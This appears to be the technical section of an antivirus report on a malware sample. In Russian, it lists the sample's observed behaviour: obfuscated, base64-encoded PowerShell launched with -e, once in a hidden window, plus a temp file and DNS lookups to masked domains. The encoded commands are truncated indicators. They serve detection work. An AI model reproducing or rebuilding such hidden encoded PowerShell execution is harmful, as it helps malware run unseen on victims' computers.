Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAFoAWgBBAEEAawBBADQAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBpAEEAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHgAJwAsACcAQQBCADQAJwApACkAKQA7ACQAR...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\793202.cvr
- DNS ASK mc####donesia.com
- DNS ASK sr####ovision.com
- DNS ASK be####metals.com
- DNS ASK la#####foundation.com
- DNS ASK be##2.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAFoAWgBBAEEAawBBADQAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBpAEEAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHgAJwAsACcAQQBCADQAJwApACkAKQA7ACQAR...' (со скрытым окном)